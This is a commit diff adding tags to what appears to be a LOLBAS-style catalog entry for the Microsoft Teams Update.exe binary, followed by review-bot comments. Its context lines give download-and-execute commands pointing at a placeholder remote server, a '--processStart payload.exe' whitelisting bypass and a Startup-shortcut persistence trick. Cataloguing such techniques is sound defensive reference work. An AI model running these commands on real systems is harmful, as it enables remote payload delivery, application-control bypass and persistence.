Update Update.yml Tags

Added Tags:
Execute Nuget
Execute Remote
Execute EXE
hegusung 2024-10-13 22:35:45 +02:00 committed by GitHub
parent ce9d4e59f5
commit 927189f01e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194


@ -18,6 +18,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
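Review bot: the `Tags:` block inserted ahead of `- Command: Update.exe --update=[url to package]` attaches to the entry that precedes it (the one whose `Privileges`/`MitreID`/`OperatingSystem` lines open this hunk), and that entry's own `Command` line is outside the hunk, so the choice of `Execute: Nuget`/`Execute: Remote` cannot be checked from the diff alone; please confirm in the file that the tagged entry is one of the package-download variants. Style point for the whole commit: the tag value is written `Nuget` while the package format is spelled NuGet; use whichever spelling the repository's existing tag vocabulary already uses, so that filtering on the tag matches every entry.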
@ -25,6 +28,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
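Review bot: the tags in this hunk land on the `--update=[url to package]` entry (the command that closed the previous hunk), which fits `Execute: Nuget` and `Execute: Remote`. The entry this hunk ends on, `--update=\\remoteserver\payloadFolder`, receives the same two tags in the next hunk even though its Description already separates the SMB path ("via SAMBA") from the HTTP one; consider whether the tag set should carry that distinction as well, since the two variants leave different network telemetry (SMB versus HTTP) for defenders to look for.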
@ -32,6 +38,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
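Review bot: the `- Command: Update.exe --update=\\remoteserver\payloadFolder` entry this hunk ends on, together with its Description and Usecase, is a verbatim duplicate of the entry the previous hunk ends on. Tagging both keeps them consistent for now, but the duplicate should be removed in a follow-up so the tags only have to be maintained in one place.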
@ -39,6 +48,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
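Review bot: the tags here attach to the second `--update=\\remoteserver\payloadFolder` copy, and the hunk ends on `--updateRollback=[url to package]`, whose Description is word for word the one given for `--update=` ("go to url and look for RELEASES file, download and install the nuget package"). If the rollback switch really behaves identically the tags are right, but the Description should state what `--updateRollback` does differently, otherwise the two entries are indistinguishable to a reader of the tagged list.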
@ -46,6 +58,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
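Review bot: the `--updateRollback=[url to package]` entry this hunk ends on duplicates the one closing the previous hunk (same Command, Description and Usecase), the second duplicated pair in this file; as with the `--update=\\remoteserver` pair, collapse the duplicates rather than tagging both copies.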
@ -53,6 +68,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Application Whitelisting Bypass
@ -60,6 +78,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
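Review bot: logic problem with the tags inserted in this hunk: they attach to the `--processStart payload.exe --process-start-args "whatever args"` entry (the command that closed the previous hunk), but that entry executes a file already copied into `%userprofile%\AppData\Local\Microsoft\Teams\current\` and involves neither a NuGet package nor a remote fetch, so `Execute: Nuget` and `Execute: Remote` are wrong here. It should carry `Execute: EXE`, as the same `--processStart` command receives further down in this commit; with the current tags, a defender filtering on `Execute: Remote` would be pointed at a purely local technique.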
@ -67,6 +88,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
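Review bot: the tags attach to `--updateRollback=\\remoteserver\payloadFolder`, a remote-fetch entry, so `Execute: Remote` fits. The hunk ends on a second, identical `--updateRollback=\\remoteserver\payloadFolder` entry (same Description and Usecase), which makes three duplicated pairs in this file; a deduplication pass in a separate change would be worthwhile.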
@ -74,6 +98,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary
@ -81,6 +108,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: EXE
- Command: Update.exe --createShortcut=payload.exe -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Usecase: Execute binary
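Review bot: `Execute: EXE` is the right tag for the `--processStart` entry this block attaches to (the command that closed the previous hunk), but it now differs from the tags the identical `--processStart` command received earlier in this commit (`Execute: Nuget`/`Execute: Remote`), so the same command is tagged two different ways; align the two, or merge the duplicate entries, whose only difference is the Usecase text.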
@ -88,6 +117,8 @@ Commands:
Privileges: User
MitreID: T1547
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: EXE
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
Usecase: Execute binary
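Review bot: the `Execute: EXE` tag attaches to the `--createShortcut=payload.exe -l=Startup` entry, whose `MitreID: T1547` (visible in this hunk's context) and Description ("payload will run on every login") describe persistence through a Startup-folder shortcut rather than execution at the time the command runs. If the tag vocabulary has a persistence tag it would describe the entry better; otherwise, document why `Execute: EXE` is used for a shortcut-creation entry, since the artifact a defender should watch for here is the new shortcut under `%appdata%\Microsoft\Windows\Start Menu\Programs\Startup` pointing into the Teams `current` directory, not a process start.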
@ -95,6 +126,8 @@ Commands:
Privileges: User
MitreID: T1070
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: EXE
Full_Path:
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\update.exe'
Code_Sample:
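Review bot: the `Execute: EXE` tag attaches to the `--removeShortcut=payload.exe -l=Startup` entry, which, by its own Description and the `MitreID: T1070` shown in this hunk's context, deletes a previously created shortcut and executes nothing; tagging it as an EXE-execution technique misleads anyone filtering on that tag. Drop the tag from this entry, or use one that reflects cleanup. Separately, the `Full_Path` context line spells the binary `update.exe` while every Command line uses `Update.exe`; not part of this change, but worth normalizing, as some tooling compares path strings case-sensitively.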